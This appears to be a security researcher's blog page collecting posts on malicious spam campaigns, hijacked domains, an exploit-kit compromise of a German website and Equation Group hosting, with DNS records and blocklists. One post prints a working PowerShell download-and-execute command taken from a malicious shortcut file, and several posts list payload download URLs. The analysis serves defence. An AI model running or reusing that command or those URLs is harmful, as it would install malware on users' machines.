Sponsored by..

Showing posts with label GoDaddy. Show all posts
Showing posts with label GoDaddy. Show all posts

Wednesday, 15 February 2017

Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation


Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery


Your Order Information
Prices include VAT at 20%


Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!


IMPORTANT INFORMATION ABOUT YOUR ORDER

Delivery

Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

http://bebracelet.com/customerarea/notification-processing-G29804772-064.doc
--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following Powershell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));

I couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK], this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on - 185.130.207.37 and 185.141.165.204 which is Host1Plus, UK / Digital Energy Technologies, DE).

Three connection to Namecheap is worrying, and certainly we've seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailsever, and indeed there are 34 of the critters name mx110.argozelo.info through to mx143.argozelo.info hosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain are revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        serial:2017021207
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address) 143.95.232.95
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all
So.. the SPF records are valid for sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?

Recommended blocklist (email)
188.214.88.0/24

Recommended blocklist (web)
5.152.199.228
185.130.207.37
185.141.165.204




Thursday, 29 October 2015

Malware spam: "Domain [domain] Suspension Notice" / abuse@enom.com.org

There appear to be many versions of this spam, aimed at domain owners and apparently coming from the actual registrar of the domain. For added authenticity, the owner's name is included in the spam. Here is one example that I got.. it would have been very convincing, except that I had the heads up on this attack a couple of day ago.

From:    ENOM, INC. [abuse@enom.com.org]
Date:    30 October 2015 at 04:11
Subject:    Domain LAPTOP-MEMORY.COM Suspension Notice

Dear Sir/Madam,

The following domain names have been suspended for violation of the ENOM, INC. Abuse Policy:

Domain Name: LAPTOP-MEMORY.COM
Registrar: ENOM, INC.
Registrant Name: CONRAD LONGMORE

Multiple warnings were sent by ENOM, INC. Spam and Abuse Department to give you an opportunity to address the complaints we have received.

We did not receive a reply from you to these email warnings so we then attempted to contact you via telephone.

We had no choice but to suspend your domain name when you did not respond to our attempts to contact you.

Click here and download a copy of complaints we have received.

Please contact us for additional information regarding this notification.

Sincerely,
ENOM, INC.
Spam and Abuse Department
Abuse Department Hotline: 480-406-7704
In this case, clicking on the link goes to edecisions.com/abuse_report.php?LAPTOP-MEMORY.COM and downloads a file LAPTOP-MEMORY.COM_copy_of_complaints.pdf.scr - it looks more authentic because the domain name is in the file download, but in fact you can specify any domain name and it gives a matching file.

Before we look at the analysis of the downloaded executable, let's look at the domain name edecisions.com. It looks like the sort of domain that might contain abuse reports, but in fact it is a hijacked GoDaddy domain hosted on 65.78.174.100 and a quick look at VirusTotal indicates that one of the other 4 sites on the same server was also compromised and was serving up malware in 2013. This is definitely a good candidate to block.

The downloaded file has a VirusTotal detection rate of 2/55. Automated analysis tools [1] [2] [3] indicate that whatever the hell this is, it tries to contact a LOT of other servers. We can see that the following domain names are accessed (mostly POST attempts):

0tv.co
abettertravelagent.com
agentclicktocall.com
airconditioning12601.com
all-inclusiveresortstravel.com
allgroupstravel.com
allreadytravel.com
ameliastyle.com
anabolicsteroidsrx.com
anunciamicasa.com
aprovechatudia.com
armangarzon.info
beachhouseplans.com
bigboattravel.com
biznal.com
bloccailmutuo.com
boilersandfurnaces.com
breakerhub.com
breathtakingsolutions.com
brindegenie.com
cameroonmarket.com
camirate.com
carltonchambers.co.uk
certifiedphytoceramides.com
chuckwhitlock.com
ciiapparelblog.com
circuitbreakerhub.com
colebar.com
cpasolutiononline.com
cruiseandtravel.agency
cruises-travelandmore.com
cruisetravelpros.com
cruisewithdawn.com
cruisingatdawn.com
cywellness.com
dallascircuitbreaker.co
dallascircuitbreaker.com
dallaselectricalsurplus.com
dallasreconditionedtransformers.com
dangerousgarciniacambogia.com
dawat-restaurant.com
designbrossard.com
designingartinstitute.com
designtravelagency.com
destinycruiseandtravel.com
enterrealtyny.com
superfunshoes.com
tarkshyainc.com

Note that almost everything is in the A-D range, which makes me suspect that this is only a fraction of the compromised domains. If we look at the IP addresses of those domains, then it gets even more interesting:

50.87.144.249 (Unified Layer, US)
50.87.151.145 (Unified Layer, US)
108.167.140.175 (WebSiteWelcome, US) [13 instances]
162.144.0.215 (Unified Layer, US)
162.144.12.115 (Unified Layer, US)
192.185.5.33 (WebSiteWelcome, US) [2 instances]
192.185.16.67 (WebSiteWelcome, US) [7 instances]
192.185.19.115 (WebSiteWelcome, US)
192.185.21.162 (WebSiteWelcome, US)
192.185.22.63 (WebSiteWelcome, US) [4 instances]
192.185.90.237 (WebSiteWelcome, US)
192.185.101.210 (WebSiteWelcome, US)
192.185.140.214 (WebSiteWelcome, US)
192.185.152.133 (WebSiteWelcome, US) [2 instances]
192.185.183.81 (WebSiteWelcome, US)
192.185.226.164 (WebSiteWelcome, US)
192.254.186.85 (WebSiteWelcome, US) [2 instances]
192.254.231.138 (WebSiteWelcome, US)
192.254.234.204 (WebSiteWelcome, US)
198.57.242.171 (Unified Layer, US) [4 instances]
198.57.244.38 (Unified Layer, US)
208.109.119.156 (GoDaddy, US)

A check of those WebSiteWelcome and Unified Layer IPs on VirusTotal (for example 192.185.226.164) indicates several compromised domains on the same server, indicating that the entire box has been popped.

It isn't clear what the payload is, but given the fact that it is aimed at domain owners and given the unusual characteristics of the malware, I can make a guess that it is some sort of password stealer, possibly harvesting domains or server admin credentials. If you are not using multi-factor authentication for your domains, then perhaps now would be a good time to choose to do so.

Recommended blocklist:
50.87.144.249
50.87.151.145
108.167.140.175
162.144.0.215
162.144.12.115
192.185.5.33
192.185.16.67
192.185.19.115
192.185.21.162
192.185.22.63
192.185.90.237
192.185.101.210
192.185.140.214
192.185.152.133
192.185.183.81
192.185.226.164
192.254.186.85
192.254.231.138
192.254.234.204
198.57.242.171
198.57.244.38
65.78.174.100

UPDATE:

The payload appears to be the Cryptowall ransomware.

Monday, 24 August 2015

Popular German wesite dwdl.de hacked, serving malware via 94.142.140.222

Popular German media website dwdl.de has been hacked and is serving up malware, according to this URLquery report.

URLquery's IDS function detects what looks like the RIG Exploit kit:


The exploit is in injected code pointing to a server at 94.142.140.222 (Marosnet Telecommunication Company, Russia) which in the example is using filter.michiganbeerhops.com which is a hijacked GoDaddy domain.

The exploit only appears to work if the site is accessed via a search engine, which looks like a classic .htaccess hack. URLquery's script relationship chart shows this in action:




VirusTotal gives an overview of other malicious domains on this server. It indicates that the following domains have been hijacked and malicious subdomains set up:

123goled.com
123gooled.com
123homeautomation.com
123oled.com
135warranty.com
1drones.com
4ktechsupport.com
audiovideoalternatives.com
audiovideoinsight.com
autonomouscontrolsystem.com
autonomouscontrolsystems.com
autonomousinterface.com
avioav.com
birminghamaudiovideo.com
birminghamtheatercompany.com
birminghamtheatersystems.com
cleanlittleengine.com
cleanpowercell.com
cleansunpower.com
clearviewelectronic.com
clearviewelectronic.net
clearviewelectronics.info
clearviewelectronics.me
clearviewelectronics.net
clearviewelectronics.org
crazyoled.com
daddybeer.com
devilscrotchhotsauce.com
dreamybikini.com
educationdrone.com
efgled.com
energeticled.com
ferndalebar.com
hometheaterlogistics.com
hopsmichigan.com
imagerled.com
inwallsoundbar.com
ledgest.com
ledimager.com
ledisme.com
ledrefill.com
ledrequired.com
ledstuf.com
lightsusingled.com
michiganbeerhops.com
timeandplacephotos.com
torredelpainelandscapes.com
travelersvisions.com
travelerviews.net
travelervisions.com
travelervisions.net
triadthinking.com
turkeylight.com
turkishlandscapes.com
tuscanycolor.com
understandinglight.com
urbanchina.info
veniciancolor.com
venicianlight.com
viewartsandsciences.com
viewevolution.com
viewevolution.net
viewevolution.org
viewhumanities.com
viewliberalarts.com
viewnaturalsciences.com
viewprocess.org
viewsocialsciences.com
visionandthought.com
visioningmind.com
visioningmind.net
visioningplace.com
visioningplace.net
visionofchina.net
visionofchina.org
visquest.info
visualcreativethinking.com
visualcreativethinking.net
visualcreativity.info
visualizationfuture.com
visualizationthinking.com
visualizingmaps.net
visualknowledge.org
visualmexico.net
vizmodeling.com
vizmodels.com
vizsee.com
vizthought.com
volgadeutsch.com
wallartbycountry.com
wayfindingadventure.com
wayfindingtravel.com
waysofthinking.com
waysofthinking.net
waystosee.net
webviews.info
westerneuropelandscapes.com
wilkiephotos.com
worldwallart.com
worldwallart.net
xianspirit.com
yunnanlandscapes.com
yunnanlight.com
zocaloscenes.com

Thursday, 2 April 2015

Malware spam: "Copy invoices Snap on Tools Ltd" / "Allen, Claire [Claire.Allen@snapon.com]"

This fake invoice does not come from Snap On Tools, but is instead a simple forgery.

From:    Allen, Claire [Claire.Allen@snapon.com]
Date:    24 February 2015 at 14:41
Subject:    Copy invoices Snap on Tools Ltd

Good Afternoon

Attached are the copy invoices that you requested.

Regards

Claire

Your message is ready to be sent with the following file or link attachments:

SKETTDCCSMF14122514571


Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments.  Check your e-mail security settings to determine how attachments are handled.
I have only seen one copy of this with an attachment SKETTDCCSMF14122514571.doc which contains this malicious macro [pastebin], which downloads a further component from:

http://ws6btg41m.homepage.t-online.de/025/42.exe

This executable has a detection rate of 5/57. Various automated analyses [1] [2] [3] [4] show attempted communications to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
72.167.62.27 (GoDaddy, US)
62.113.219.35 (23Media GmbH, Germany)
46.101.49.125 (Digital Ocean, UK)
130.241.92.141 (Goteborgs Universitet, Sweden)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc., US)
94.23.173.233 (OVH, Czech Republic)
14.98.243.243 (Tata Indicom, India)
5.100.249.215 (O.M.C. Computers & Communications, Israel)
62.113.223.227 (23Media GmbH, Germany)

According to this Malwr report  it drops another version of the downloader called edg1.exe [VT 4/57] and a malicious Dridex DLL [VT 2/57].

Recommended blocklist:
91.242.163.70
72.167.62.27
62.113.219.35
46.101.49.125
130.241.92.141
198.245.70.182
94.23.173.233
14.98.243.243
5.100.249.215
62.113.223.227

MD5s:
dc92858693f62add2eb4696abce11d62
6fb2f86986e074cf44bd4c9f68e9822e
9565b17a4f1221fee473d0d8660dc26d
62e780a6237c6f9fd0a8e16a2823562d





Wednesday, 1 April 2015

Malware spam: "Batchuser BATCHUSER [ecommsupport@cihgroup.com]" / "CIH Delivery Note 0051037484"

The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment.

From:    Batchuser BATCHUSER [ecommsupport@cihgroup.com]
Date:    31 March 2015 at 09:15
Subject:    CIH Delivery Note 0051037484

**********************************************************************
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD

**********************************************************************
Apart from the disclaimer there is no body text. If you do as the disclaimer says and run attached Word document (CIH Delivery Note 0051037484.doc) through an anti-virus product then it will appear to clean, but it actually contains this malicious macro [pastebin] which downloads a component from:

http://www.tschoetz.de/122/091.exe

This is saved as %TEMP%\stoiki86.exe. There are usually two or three different download locations, but they will all lead to the the same binary which in this case has a detection rate of 5/56.

Various automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
37.139.47.81 (Comfortel Ltd / Pirix, Russia)
72.167.62.27 (GoDaddy, US)
212.227.89.182 (1&1, Germany)
46.228.193.201 (Aqua Networks Ltd, Germany)
46.101.49.125 (Digital Ocean Inc, Netherlands)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc, US)
95.211.184.249 (Leaseweb, Netherlands)

According to this Malwr report it also drops another version of the downloader [VT 4/57] and a malicious DLL which will almost definitely be Dridex [VT 2/57].

Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249

Tuesday, 17 February 2015

An analysis of reported Equation Group IP ranges and domains

There has been a lot of buzz this morning about "The Equation Group", a possible state actor involved in placing malware on hard disks [1] [2] [3] [4].

Securelist (in conjunction with Kaspersky) published a list of domains and IPs to do with this malware, but with very little information about where they were hosted. After all, if they a hosted in a shed next to the bus station in Tiraspol or some underground complex buried under Wutong Mountain, then it's a rather different proposition from some secretive organisation in Washington DC.

Securelist post a number of hardcoded IPs as well as some domain names. Kaspersky have sinkholed some of the domains, and I can see one other active sinkhole. At least one of the domains is parked. Some of the domains look like they are not in use.

The data I collected can be found here, but before you use any of it, I will explain in more detail so you can use it prudently.

There are several web hosts and networks involved, all over the world. Some seem to have a higher certainty of involvement than others. In most cases, the Equation Group have rented a bunch of servers with contiguous IP addresses (I call this the "Equation Range") which is the one that I recommend you monitor. Some web hosts have other suspect IP addresses in the same neighbourhood, but in order to keep things simple I am not going into that.

(Updated 18/2/15 to remove an OpenDNS sinkhole and add 41.222.35.70)

FLAG Telecom / Reliance Globalcom

62.216.152.64/28
80.77.2.160/27
80.77.4.0/26

Allegedly a partner of the NSA and GCHQ, these IP addresses appear to be in the UK, US and Egypt (I would doubt the accuracy of the WHOIS data for the last one). In addition to apparently hardcoded IPs, they also host:

team4heat.net
forgotten-deals.com
phoneysoap.com
cigape.net
mimicrice.com
charmedno1.com
functional-business.com
rehabretie.com
advancing-technology.com
crisptic01.net
tropiccritics.com
cribdare2no.com
following-technology.com
teatac4bath.com

Verizon

194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
202.95.84.32/27
210.81.52.96/27
212.177.108.192/27

Another company with a long history with the NSA, these Verizon IPs are all located outside the United States, specfically the Netherlands, Singaporre, Japana and Italy. In addition to hardcoded IPs, they are hosting:

honarkhaneh.net
meevehdar.com
parskabab.com
ad-noise.net
ad-void.com
aynachatsrv.com
damavandkuh.com
fnlpic.com
monster-ads.net
nowruzbakher.com
sherkhundi.com
quickupdateserv.com
goodbizez.com
www.dt1blog.com
www.forboringbusinesses.com
timelywebsitehostesses.com
technicads.com
darakht.com
ghalibaft.com
adservicestats.com
downloadmpplayer.com
honarkhabar.com
techsupportpwr.com
webbizwild.com
zhalehziba.com

Global Telecom & Technology Americas Inc. / Cogent / PSInet

149.12.71.0/26

This Cogent customer has at least four different IPs hosting Equation Group servers. The following domains are hosted:

avidnewssource.com
rubi4edit.com
listennewsnetwork.com
unite3tubes.com

Colombia: Alfan Empaques Flexibles S.A. / Columbus Networks / IFX Networks / Terremark

64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
190.60.202.0/28
190.60.202.0/28

The relationship between the US and Colombia is difficult, with the former spying on the latter extensively. Why there should be a cluster of servers in Colombia connected with this is a mystery. In addition to hardcoded IPs, the following domains are hosted in Colombia:

selective-business.com
technicalconsumerreports.com
technicaldigitalreporting.com
technology-revealed.com
melding-technology.com

Czech Republic: Master Internet / IT-PRO / 4D Praha

81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27

A group of three internet companies (possibly using the same infrastructure) also appear to be involved. All these IPs appear to be in the city of Brno, which is also home to the Czech National Cyber Security Center. Coincidence? The following domains can be found on Czech IPs in addition to hardcoded addresses:

islamicmarketing.net
noticiasftpsrv.com
coffeehausblog.com
platads.com
nickleplatedads.com
arabtechmessenger.net

Spain: Terremark / GTT Global Telecom

84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28


Terremark also provide hosting services for Equation in Colmbia, and of course Spain is a long-time ally of the United States and United Kingdom. Web sites hosted:

businessedgeadvance.com
business-made-fun.com
rampagegramar.com
unwashedsound.com
businessdealsblog.com
industry-deals.com
itemagic.net
posed2shade.com
slayinglance.com
rubiccrum.com
rubriccrumb.com

Netherlands: Tripartz-Atrato / IX Reach / Claranet / FiberRing

212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109

In addition to Verizon, four other Netherlands companies are hosting Equation Group servers. The Netherlands is another long-time ally of the US and UK.

arm2pie.com
businessdirectnessource.com
housedman.com
taking-technology.com
micraamber.net
charging-technology.com
brittlefilet.com
dowelsobject.com
speedynewsclips.com

Malaysia: Piradius NET

124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29

Often appearing to be a "go-to" company if you want to set up a Black Hat reseller, these domains and IPs look like they have been picked up as part of a commercial offering.

roshanavar.com
adsbizsimple.com
bazandegan.com
amazinggreentechshop.com
foroushi.net
technicserv.com
afkarehroshan.com
thesuperdeliciousnews.com
sherkatkonandeh.com
mashinkhabar.com

Other ranges and hosts

  • RACSA in Costa Rica hosts customerscreensavers.com and xlivehost.com on 196.40.84.8/29.
  • EasySpeed in Denmark hosts  quik-serv.com and goldadpremium.com on 82.103.134.48/30.
  • Cyber Cast International in Panama hosts havakhosh.com and toofanshadid.com on 200.115.174.254.
  • EM Technologies in Panama hosts technicupdate.com and rapidlyserv.com on 201.218.238.128/26.
  • INET in Thailand hosts globalnetworkanalys.com on 203.150.231.49 with an apparently hardcoded IP of 203.150.231.73 in use as well.
  • American Internet Services hosts suddenplot.com on 207.158.58.102.
  • GoDaddy hosts serv-load.com and wangluoruanjian.com on 97.74.104.208.
  • Quadranet / GZ Systems hosts fliteilex.com plus some other questionable domains on 67.215.237.104/29.
  • Vegas Linkup LLC hosts standardsandpraiserepurpose.com on 209.59.42.97.
  • Vox Telecom in South Africa hosts mysaltychocolateballs.com on 41.222.35.70 having previously hosted forboringbusinesses.com.
In all the following network blocks and IPs appear to be hosting servers connected to the Equation Group:

64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
69.42.114.96/28
196.40.84.8/29
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
82.103.134.48/30
80.77.2.160/27
84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
212.177.108.192/27
210.81.52.96/27
124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29
212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
200.115.174.254
201.218.238.128/26
202.95.84.32/27
203.150.231.49
203.150.231.73
62.216.152.64/28
207.158.58.102
149.12.71.0/26
80.77.4.0/26
97.74.104.208
67.215.237.104/29
209.59.42.97
41.222.35.70

I recommend that you look at the data before you do drastic things with these IP ranges.

Now, I don't know for certain that this malware is a government actor, but the IP address indicate that whoever it is has a relationship with these companies (especially Verizon). That certainly feels like a state actor to me..

Thursday, 8 January 2015

Persistent hijacked GoDaddy domains serve malware via Turkish IPs

Last year I wrote about a small bunch of IPs belonging to Radore Veri Merkezi Hizmetleri A.S in Turkey that seemed to be aggressively pushing an exploit kit via hijacked GoDaddy domains. Today I was slightly surprised to see that this is still going on, and in some cases using the same domains as they were all those months ago.

Let's start by looking at an example hijacked domain gssportspics.com which is a neat little site with some high school photos of sports and events on.


We can look up the DNS details for www.gssportspics.com and they look OK with an IP of 184.168.152.5 which belongs to GoDaddy.

01/08/15 14:06:28 dns www.gssportspics.com
Mail for www.gssportspics.com is handled by smtp.secureserver.net mailstore1.secureserver.net
Canonical name: gssportspics.com
Aliases:
  www.gssportspics.com
Addresses:
  184.168.152.5


The domain is registered by GoDaddy, the domain is hosted by GoDaddy. Makes sense, and the website is clean of malware as far as I can tell.

But the problem is that there are a whole bunch of subdomains also using the gssportspics.com that you can't easily tell are there. For example, these subdomains all exist too:

invu.gssportspics.com
yossi.gssportspics.com
auckle.gssportspics.com
sively.gssportspics.com
truset.gssportspics.com
vishal.gssportspics.com
sovieana.gssportspics.com
wiramart.gssportspics.com
gardenhour.gssportspics.com
spechtling.gssportspics.com

Let's look up one of these..

01/08/15 14:24:45 dns vishal.gssportspics.com
Canonical name: vishal.gssportspics.com
Addresses:
  31.210.96.158


Well, that IP address ain't GoDaddy.

inetnum:        31.210.64.0 - 31.210.127.255
netname:        TR-RADORE-20110504
descr:          Radore Veri Merkezi Hizmetleri A.S.
country:        TR
org:            ORG-RHTH1-RIPE
admin-c:        RLA11-RIPE
tech-c:         RLA11-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      RADORE-MNT
mnt-routes:     RADORE-MNT
mnt-domains:    RADORE-MNT
notify:         registry@rh.com.tr
changed:        hostmaster@ripe.net 20110504
changed:        hostmaster@ripe.net 20130410
changed:        bit-bucket@ripe.net 20130930
source:         RIPE


Well, we've been here before and I can tell you that these sort of hijacked sites are hosted on the following IPs:

31.210.96.155
31.210.96.156
31.210.96.157
31.210.96.158


I don't know how this Turkish host suballocates IPs to customers, but it is roughly equivalent to 31.210.96.152/29.

So how are these hijacks happening? Actually, I don't know although I do know that this is very common with GoDaddy accounts that use domaincontrol.com namservers. Perhaps the accounts are being phished, hit in an XSS attack or there is a weakness in GoDaddy's DNS architecture. GoDaddy are normally very good at cleaning this sort of thing up, so let's hope they can put a stop to this now.

What the exact payload of these IPs is I don't know because it is hardened against analysis, but they have hosted Ponmocup in the past.  I have observed traffic being sent to these server via hacked sites, and given the subdomain hijacking then it is clear that something very bad is going on. You can see an example of URLquery failing to analyse one of these sites here.. I suspect that the payload only works once per visiting IP.

You can see an example of some of the LIVE subdomains hosted on these IPs here [pastebin] or a full list of ALL the hijacked subdomains that I seen over time in this range here.

Currently, these following domains all have hijacked subdomains, as far as I can tell, they are all legitimate sites and I would hesitate to block them.. instead I would recommend blocking the IP address ranges listed above instead.

21ideas.com
2cuonline.com
4runnerliftkits.com
8jutawan.com
aabathlifts.com
adventureresponsibly.com
advertisementdevil.com
advertisewiththedevil.com
aesirholdings.com
agentonpoint.com
ahtcna.com
alhogames.com
alisonleese.com
allknowingpsychic.com
alloyfurnacerolls.com
alloymuffles.com
alloyradianttubes.com
allprodelta.com
alternateolympics.com
alternativeolympics.com
ancestorworshippublishing.com
animalgenetics.com
antonzuponcic.com
arc4g.com
aredietsok.com
aredietsokay.com
assistlist.com
asstimate.net
atvguidebooks.com
atv-guidebooks.com
atvtrailguides.com
autoeventregistration.com
automotiveeventregistration.com
automotiveservicesavings.com
autoserviceevent.com
aylesburyironing.com
azproremodelers.com
bahenasteel.com
bakecakesnow.com
basslakeshagclub.com
be3ny.com
benahavisrealestate.com
berkshirecapitalholdings.com
bestsilvercufflinks.com
bgtoledorent.com
birdsexingkit.com
blingmatters.com
blurlight.com
boeckman.net
breastimate.com
bridgenations.com
bristolblog.com
bristolwatch.com
bumperstickerpatriots.com
buybackmyvehicle.com
buynewaz.com
buynowbuynewaz.com
bvvk.com
canadianpilotcars.com
caninecolorgenetics.com
caninepaternitytesting.com
caseybassett.com
castlelawpa.com
caytechpools.com
charlesawells.com
chrisvessey.com
ciunev.com
concretevibration.com
connecteli.com
connectmetv.com
consul-tec.com
consumerdevil.com
cruzeonover.com
custom-chocolate-favors.com
customerdevil.com
dealerholidayevent.com
deespilotcars.com
defeattheliberalmedia.com
deliveredbythedevil.com
devilforacause.com
devilwithacause.com
dkshealth.com
drinkbluphoria.com
drinkcalories.net
drjaneaxelrod.com
dropoutgobig.com
dunstablekitchens.com
eaglepocatello.com
effectsllc.com
egunt.com
ellagphotography.com
empowerprinciples.com
engpua.com
enhancementlasers.com
enhancinglasers.com
equinepaternitytesting.com
exceltoner.com
exceltoners.com
facenewbook.com
fantasticfountain.com
fathersnsons.com
fatlosstoolkit.com
felixtreitler.com
feltedfibers.com
fighttheliberalmedia.com
fortheloveofgadgets.com
frankryn.com
freegascardregistration.com
fubarpaintball.com
funtrecks.net
funtreks.net
funtrekspublishing.com
gee-wizsolutions.com
getpaid365days.com
gillspools.com
girlsgoneglamis.com
gliscastings.net
gliscentrifugal.com
glisfabrications.com
glisinc.com
golfironworks.com
golfnewsalaska.com
golfnewsarkansas.com
golfnewscolorado.com
golfnewsconnecticut.com
golfnewsdelaware.com
golfnewsgeorgia.com
golfnewsidaho.com
golfnewsillinois.com
golfnewsindiana.com
golfnewsiowa.com
golfnewskansas.com
golfnewskentucky.com
golfnewslouisiana.com
golfnewsmaine.com
golfnewsmaryland.com
golfnewsmassachusetts.com
golfnewsmississippi.com
golfnewsmissouri.com
golfnewsmontana.com
golfnewsnebraska.com
golfnewsnewengland.com
golfnewsnewhampshire.com
golfnewsnewjersey.com
golfnewsnewmexico.com
golfnewsnewyork.com
golfnewsnorthcarolina.com
golfnewsnorthdakota.com
golfnewsohio.com
golfnewsoklahoma.com
golfnewspennsylvania.com
golfnewsrhodeisland.com
golfnewssouthcarolina.com
golfnewssouthdakota.com
golfnewstennessee.com
golfnewsutah.com
golfnewsvermont.com
golfnewsvirginia.com
golfnewswestvirginia.com
golfnewswisconsin.com
golfnewswyoming.com
grafikcase.com
grafikdevils.com
grafik-devils.com
grafik-skins.com
greatserviceforless.com
greatsoundevents.com
gregorylknox.com
grupa-kim.com
gryphonaz.com
gryphoncompanies.com
gryphonus.com
gssportspics.com
haosjer.com
hartford-capital.com
hbacagreenproremodelers.com
hbacaproremodelers.com
heattreatalloy.com
historyhobbybooks.com
hockeydoneright.com
hugesavingsevent.com
humphreyslawncare.com
icecreamtruckuniversity.com
imokh.com
inboccaproductions.com
inkandtonersale.com
integratedpipe.com
italy-in-bocca.com
javaemulator.com
jmydesign.com
joannheilman.com
joeamericashow.com
joechenphoto.com
jsjenterprises.com
juddnelsonstudios.com
kaitlinsplayground.com
kevindonnellymd.com
knoxkomputerservice.com
kokobon.com
ksupride.com
ksupridewrestling.com
ksuwrestling.net
lakehousetimberranch.com
laser-enhancements.com
laserhairenhancement.com
launchyourline.com
learningoverip.com
leashyourcamera.com
lendmecash.com
letseatinitaly.com
lifestylology.com
lindseytoothman.com
lionizetheworld.com
lionizeyourself.com
lions-mark.com
lovetoner.com
lovetoners.com
lsclinks.com
lusitanogold.com
makingwaves-salon.com
mangiamoinitalia.com
